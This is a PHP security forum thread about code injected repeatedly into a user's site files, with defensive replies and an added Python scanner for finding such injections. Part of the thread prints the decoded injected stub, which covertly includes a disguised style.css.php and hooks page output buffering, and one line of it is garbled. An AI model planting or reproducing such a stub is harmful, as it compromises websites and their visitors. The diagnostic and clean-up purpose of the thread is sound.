code added to my php files

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

fascript
Forum Newbie
Posts: 5
Joined: Tue Jun 16, 2009 6:25 am

code added to my php files

Post by fascript »

Hi, we keep getting a spam code inserted somehow into our PHP files. How do we stop it? We keep changing the password etc. in cPanel, but every so often we keep getting it. I have just deleted it before I made the post, so I can't add it, but it has words like eval etc. in it. Does anyone know of a remedy? Thanks guys.
Paul Arnold
Forum Contributor
Posts: 141
Joined: Fri Jun 13, 2008 10:09 am
Location: Newcastle Upon Tyne

Re: code added to my php files

Post by Paul Arnold »

You've probably got your permissions set too high.
Try setting them to 644.
fascript
Forum Newbie
Posts: 5
Joined: Tue Jun 16, 2009 6:25 am

Re: code added to my php files

Post by fascript »

Thanks but they are set at 644
VladSun
DevNet Master
Posts: 4313
Joined: Wed Jun 27, 2007 9:44 am
Location: Sofia, Bulgaria

Re: code added to my php files

Post by VladSun »

Who's the owner (the system one ;) ) of these files?
There are 10 types of people in this world, those who understand binary and those who don't
jaoudestudios
DevNet Resident
Posts: 1483
Joined: Wed Jun 18, 2008 8:32 am
Location: Surrey

Re: code added to my php files

Post by jaoudestudios »

fascript wrote: Hi we keep getting a spam code inserted somehow in to our php files

Is it definitely into your PHP files or into the database, and is it being shown on your web pages?
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: code added to my php files

Post by kaisellgren »

Are you saying someone has modified (keeps modifying) your PHP files?
fascript
Forum Newbie
Posts: 5
Joined: Tue Jun 16, 2009 6:25 am

Re: code added to my php files

Post by fascript »

Hi, yes, it's happened a couple of times. In fact, here's one I didn't clean out:


<? /**/eval(base64_decode('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')); ?>
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: code added to my php files

Post by kaisellgren »

Great... someone has cracked into your system pretty much. :P

It could be almost anything. FTP account exposed, vulnerable web server or a vulnerable application installed on your hosting account.

At this point I can only recommend you to update all software and remove all unnecessary software. Update all credentials (even FTP, etc) and then put your site back online. If this stops the modification of your files, then one or more applications that you updated was/were vulnerable to an attack.
fascript
Forum Newbie
Posts: 5
Joined: Tue Jun 16, 2009 6:25 am

Re: code added to my php files

Post by fascript »

Thanks guys for your comments. I did have someone decode it; it looks like harmless spam. As soon as I delete it, it comes back as if it knows, lol.
fascript
Forum Newbie
Posts: 5
Joined: Tue Jun 16, 2009 6:25 am

CODE

Post by fascript »

jaoudestudios wrote: Is it definitely into your php files or into the database? and is being shown on your web pages?

No, nothing else is visible apart from what should be showing.
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: code added to my php files

Post by Eric! »

Are your php scripts pulling data from anywhere? A database, other sites, etc?

Does it come back immediately even after changing all your account passwords?

You should also notify your host provider; someone sharing the system with you might have found a hole to access your file structure.
onion2k
Jedi Mod
Posts: 5263
Joined: Tue Dec 21, 2004 5:03 pm
Location: usrlab.com

Re: code added to my php files

Post by onion2k »

It decodes to this..

Code:

if (function_exists('ob_start')&&!isset($GLOBALS['sh_no'])) { 
 
    $GLOBALS['sh_no'] = 1;
 
    if(file_exists('/home/freeac/public_html/forums/Themes/classic/images/topic/style.css.php')) {
 
        include_once('/home/freeac/public_html/forums/Themes/classic/images/topic/style.css.php');
        
        if(function_exists('gml')&&!function_exists('dgobh')) { 
            
            if(!function_exists('gzdecode')) { 
            
                function gzdecode($var2) { 
                
                    $var1 = ord(substr($var2,3,1));
                    $var3 = 10;
                    $var4 = 0;
 
                    if($var1&4) { 
 
                        $var4 = unpack('v', substr($var2,10,2));
                        $var4 = $var4[1];
                        $var3 += 2+$var4;
                    
                    }
                    
                    if($var1&8) { 
                    
                        $var3 = strpos($var2,chr(0),$var3)+1;
                    
                    }
                    
                    if($var1&16) { 
                    
                        $var3 = strpos($var2,chr(0),$var3)+1;
                        
                    }
                    
                    if($var1&2) { 
                    
                        $var3 += 2; 
                    
                    }
                    
                    $var5 = gzinflate(substr($var2,$var3));
                    
                    if($var5===FALSE) { 
                    
                        $var5 = $var2;
                        
                    } 
                    
                    return $var5;
                    
                }
 
            }
            
            function dgobh($var6) { 
            
                Header('Content-Encoding: none');
                
                $var7 = gzdecode($var6);
 
                if (preg_match('/\]*\>)/si','$1'.gml(),$var7);
                
                } else {
                
                return gml().$var7;
                
             }
             
        }
         
        ob_start('dgobh');
 
        }
    }
 
}
It's looking for some sort of forum software. If you're using some it's been compromised. Update it to the latest version, or better still, switch to something else.
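
For triage of the kind of injection discussed in this thread, the following is an added example (not code from any poster here): it walks a web root, finds `eval(base64_decode('...'))` wrappers, decodes them statically without executing anything, and lists the file paths the decoded stub includes, along with each infected file's mode and owner uid. The function names and the sample paths in `demo()` are constructed for illustration.

```python
import base64
import os
import re
import tempfile

# Matches the wrapper seen in the thread: eval(base64_decode('...')).
INJECT_RE = re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)", re.I)
# Paths the decoded stub pulls in via include/require.
INCLUDE_RE = re.compile(rb"(?:include|require)(?:_once)?\s*\(\s*['\"]([^'\"]+)['\"]", re.I)

def inspect_file(path):
    """Return one finding per injected wrapper in `path`; decodes only, never executes."""
    with open(path, "rb") as fh:
        data = fh.read()
    st = os.stat(path)
    findings = []
    for m in INJECT_RE.finditer(data):
        try:
            decoded = base64.b64decode(m.group(1))
        except ValueError:  # malformed payload: still report the wrapper itself
            decoded = b""
        findings.append({
            "file": path, "offset": m.start(),
            "mode": oct(st.st_mode & 0o777), "uid": st.st_uid,
            "includes": sorted({p.decode("utf-8", "replace") for p in INCLUDE_RE.findall(decoded)}),
        })
    return findings

def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk `root` and collect findings for every PHP-like file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(exts):
                hits.extend(inspect_file(os.path.join(dirpath, name)))
    return hits

def demo():
    """Constructed web root: one clean file, one with a constructed injected stub."""
    stub = b"if(file_exists('/srv/example/images/style.css.php')){include_once('/srv/example/images/style.css.php');}"
    injected = b"<? /**/eval(base64_decode('" + base64.b64encode(stub) + b"')); ?>\n<?php echo 'page'; ?>\n"
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "wb") as fh:
            fh.write(injected)
        with open(os.path.join(root, "clean.php"), "wb") as fh:
            fh.write(b"<?php echo 'ok'; ?>\n")
        return [(os.path.basename(h["file"]), h["includes"]) for h in scan_tree(root)]
```

The included paths are worth checking first: a `.php` file sitting in an images or theme directory, like the one in the decoded stub above, has to be removed along with the injected lines.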